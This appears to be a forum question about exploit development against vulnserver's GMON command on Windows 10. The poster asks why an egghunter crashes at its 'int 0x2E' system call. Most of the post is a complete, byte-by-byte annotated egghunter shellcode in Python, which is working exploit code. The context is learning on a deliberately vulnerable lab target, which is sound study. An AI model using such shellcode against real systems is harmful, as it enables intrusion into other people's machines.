“int 0x2E” instruction


While trying to exploit vulnserver (GMON), on windows 10, using an egghunter, the program crash in the instruction "int 0x2E" of the egghunter. The exploit work if I use jumps.

Do someone know if there is any issue or protection with the int 0x2E and int 0x80 instructions on Windows 10 ?

Used egg hunter :

egghunter = "" egghunter += "\x66\x81\xCA\xFF\x0F" # or dx, 0x0fff egghunter += "\x42"                 # inc edx egghunter += "\x52"                 # push edx egghunter += "\x6A\x02"             # push 0x2 egghunter += "\x58"                 # pop eax egghunter += "\xCD\x2E"             # int 0x2e egghunter += "\x3C\x05"             # cmp al, 0x5 egghunter += "\x5A"                 # pop edx egghunter += "\x74\xEF"             # jz 0x0 egghunter += "\xB8\x6e\x6f\x70\x65" # mov eax, 0x6e6f7065 egghunter += "\x8B\xFA"             # mov edi,edx egghunter += "\xAF"                 # scasd egghunter += "\x75\xEA"             # jnz 0x5 egghunter += "\xAF"                 # scasd egghunter += "\x75\xE7"             # jnz 0x5 egghunter += "\xFF\xE7"             # jmp edi